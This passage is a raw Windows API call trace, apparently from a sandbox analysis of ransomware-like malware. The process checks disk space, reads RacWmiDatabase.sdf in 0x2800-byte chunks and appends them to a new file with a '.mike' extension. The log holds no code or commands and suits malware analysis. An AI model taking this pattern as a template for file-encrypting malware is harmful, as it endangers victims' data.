lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.238] CoTaskMemFree (pv=0x4e1c10) [0136.239] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.239] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.239] CoTaskMemFree (pv=0x4e1c10) [0136.241] CreatePipe (in: hReadPipe=0x2af064, hWritePipe=0x2af060, lpPipeAttributes=0x2aefe4, nSize=0x0 | out: hReadPipe=0x2af064*=0x284, hWritePipe=0x2af060*=0x1d4) returned 1 [0136.242] CreatePipe (in: hReadPipe=0x2af064, hWritePipe=0x2af060, lpPipeAttributes=0x2aefe4, nSize=0x0 | out: hReadPipe=0x2af064*=0x284, hWritePipe=0x2af060*=0x278) returned 1 [0136.242] CoTaskMemAlloc (cb=0x20e) returned 0x4e1c10 [0136.242] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x4e1c10 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0136.242] CoTaskMemFree (pv=0x4e1c10) [0138.203] SleepEx (dwMilliseconds=0x100, bAlertable=1) returned 0x0 [0138.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0138.485] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0138.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0138.485] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), fInfoLevelId=0x0, lpFileInformation=0x210d074 | out: lpFileInformation=0x210d074*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd10d74c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0x1b1617c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x25000)) returned 1 [0138.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0138.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0138.485] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), fInfoLevelId=0x0, lpFileInformation=0x210d374 | out: lpFileInformation=0x210d374*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd10d74c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0x1b1617c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x25000)) returned 1 [0138.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0138.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0138.486] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0138.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0138.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0138.486] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0138.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0138.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.487] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.488] GetFileType (hFile=0x280) returned 0x1 [0138.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.488] GetFileType (hFile=0x280) returned 0x1 [0138.488] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0138.488] WriteFile (in: hFile=0x280, lpBuffer=0x210e118*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x210e118*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0138.489] CloseHandle (hObject=0x280) returned 1 [0138.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0138.489] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), fInfoLevelId=0x0, lpFileInformation=0x210dc3c | out: lpFileInformation=0x210dc3c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd10d74c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0x1b1617c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x25000)) returned 1 [0138.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0138.489] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.489] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.489] GetFileType (hFile=0x280) returned 0x1 [0138.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.489] GetFileType (hFile=0x280) returned 0x1 [0138.489] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0138.490] ReadFile (in: hFile=0x280, lpBuffer=0x210f23c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x210f23c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0138.490] CloseHandle (hObject=0x280) returned 1 [0138.490] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.490] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.490] GetFileType (hFile=0x280) returned 0x1 [0138.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.491] GetFileType (hFile=0x280) returned 0x1 [0138.491] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0138.491] WriteFile (in: hFile=0x280, lpBuffer=0x21197a4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21197a4*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.491] CloseHandle (hObject=0x280) returned 1 [0138.491] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.491] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.491] GetFileType (hFile=0x280) returned 0x1 [0138.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.491] GetFileType (hFile=0x280) returned 0x1 [0138.492] SetFilePointer (in: hFile=0x280, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2800 [0138.492] ReadFile (in: hFile=0x280, lpBuffer=0x211c1f4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x211c1f4*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0138.492] CloseHandle (hObject=0x280) returned 1 [0138.492] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.492] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.493] GetFileType (hFile=0x280) returned 0x1 [0138.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.493] GetFileType (hFile=0x280) returned 0x1 [0138.493] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2a20 [0138.493] WriteFile (in: hFile=0x280, lpBuffer=0x212675c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x212675c*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.493] CloseHandle (hObject=0x280) returned 1 [0138.493] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.493] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.493] GetFileType (hFile=0x280) returned 0x1 [0138.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.493] GetFileType (hFile=0x280) returned 0x1 [0138.493] SetFilePointer (in: hFile=0x280, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x5000 [0138.494] ReadFile (in: hFile=0x280, lpBuffer=0x21291ac, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21291ac*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0138.494] CloseHandle (hObject=0x280) returned 1 [0138.494] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.494] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.494] GetFileType (hFile=0x280) returned 0x1 [0138.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.495] GetFileType (hFile=0x280) returned 0x1 [0138.495] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5220 [0138.495] WriteFile (in: hFile=0x280, lpBuffer=0x2133714*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2133714*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.495] CloseHandle (hObject=0x280) returned 1 [0138.495] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.495] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.495] GetFileType (hFile=0x280) returned 0x1 [0138.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.495] GetFileType (hFile=0x280) returned 0x1 [0138.495] SetFilePointer (in: hFile=0x280, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x7800 [0138.495] ReadFile (in: hFile=0x280, lpBuffer=0x2136164, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2136164*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0138.496] CloseHandle (hObject=0x280) returned 1 [0138.496] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.496] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.496] GetFileType (hFile=0x280) returned 0x1 [0138.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.496] GetFileType (hFile=0x280) returned 0x1 [0138.497] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x7a20 [0138.497] WriteFile (in: hFile=0x280, lpBuffer=0x21406cc*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21406cc*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.497] CloseHandle (hObject=0x280) returned 1 [0138.497] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.497] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.497] GetFileType (hFile=0x280) returned 0x1 [0138.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.497] GetFileType (hFile=0x280) returned 0x1 [0138.497] SetFilePointer (in: hFile=0x280, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xa000 [0138.497] ReadFile (in: hFile=0x280, lpBuffer=0x214311c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x214311c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0138.498] CloseHandle (hObject=0x280) returned 1 [0138.498] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.498] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.498] GetFileType (hFile=0x280) returned 0x1 [0138.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.498] GetFileType (hFile=0x280) returned 0x1 [0138.498] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0xa220 [0138.499] WriteFile (in: hFile=0x280, lpBuffer=0x214d684*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x214d684*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.499] CloseHandle (hObject=0x280) returned 1 [0138.499] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.499] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.499] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.499] GetFileType (hFile=0x280) returned 0x1 [0138.499] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.499] GetFileType (hFile=0x280) returned 0x1 [0138.499] SetFilePointer (in: hFile=0x280, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xc800 [0138.499] ReadFile (in: hFile=0x280, lpBuffer=0x21500d4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21500d4*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0138.500] CloseHandle (hObject=0x280) returned 1 [0138.500] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.500] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.500] GetFileType (hFile=0x280) returned 0x1 [0138.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.501] GetFileType (hFile=0x280) returned 0x1 [0138.501] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0xca20 [0138.501] WriteFile (in: hFile=0x280, lpBuffer=0x215a63c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x215a63c*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.501] CloseHandle (hObject=0x280) returned 1 [0138.501] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x0) returned 0x3d [0138.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0138.501] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.501] GetFileType (hFile=0x280) returned 0x1 [0138.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0138.501] GetFileType (hFile=0x280) returned 0x1 [0138.501] SetFilePointer (in: hFile=0x280, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xf000 [0138.501] ReadFile (in: hFile=0x280, lpBuffer=0x215d08c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x215d08c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0138.502] CloseHandle (hObject=0x280) returned 1 [0138.502] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike", lpFilePart=0x0) returned 0x42 [0138.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0138.502] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.mike" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0138.502] GetFileType (hFile=0x280) returned 0x1 [0138.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0138.503] GetFileType (hFile=0x280) returned 0x1 [0138.503] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, 